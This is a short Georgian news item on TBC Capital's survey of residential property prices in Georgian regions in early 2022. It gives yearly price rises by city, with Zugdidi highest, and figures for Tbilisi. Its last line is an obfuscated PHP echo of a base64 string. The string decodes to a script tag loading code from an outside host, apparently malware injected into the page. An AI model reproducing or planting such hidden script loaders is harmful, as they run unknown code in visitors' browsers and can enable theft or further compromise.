celsiusi
ავერსი შნაიდერი
თიბისი კაპიტალმა საქართველოს რეგიონებში საცხოვრებელი უძრავი ქონების ბაზარის კვლევა ჩაატარა. ანგარიშის მიხედვით, 2022 წლის პირველ კვარტალში ქვეყანაში უძრავი ქონების ღირებულება წლიურად 8%-ით არის გაძვირებული.
 
რატომ არის მნიშვნელოვანი: მშენებლობისა და უძრავ ქონებასთან დაკავშირებული საქმიანობების სექტორები საქართველოს ეკონომიკის მნიშვნელოვან ნაწილს წარმოადგენს.
 
დეტალები: თიბისი კაპიტალი წერს, რომ მიმდინარე წლის იანვარ-მარტში კვადრატული მეტრი საცხოვრებელი უძრავი ქონების საშუალო გასაყიდი ფასი საქართველოში 756 დოლარი იყო. ასეთია იმ 5 ქალაქის ჩამონათვალი, სადაც იმავე პერიოდში უძრავი ქონება ყველაზე მეტად გაძვირდა:
 
ზუგდიდი — წლიური გაძვირება 40%;
ქობულეთი — 32%;
ქუთაისი — 20%;
ფოთი — 19%;
რუსთავი — 9%.
ამასთან, მიმდინარე წლის პირველ კვარტალში უძრავ ქონებასთან დაკავშირებული ტრანზაქციები წლიურად ყველაზე მეტად ზუგდიდიში (123%) იყო გაზრდილი.
 
რაც შეეხება თბილისს, დედაქალაქში 2022 წლის მეორე კვარტალში, გასული წლის იმავე პერიოდთან შედარებით, უძრავ ქონებაზე ფასები 4,5%-ით არის გაზრდილი.
 
2022 წლის მეორე კვარტალში როგორც ახლად აშენებული ბინების, ისე კერძო სახლების სეგმენტში ყველაზე ძვირად მთაწმინდის უბანში არსებული უძრავი ქონება ფასობდა.
 
682
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");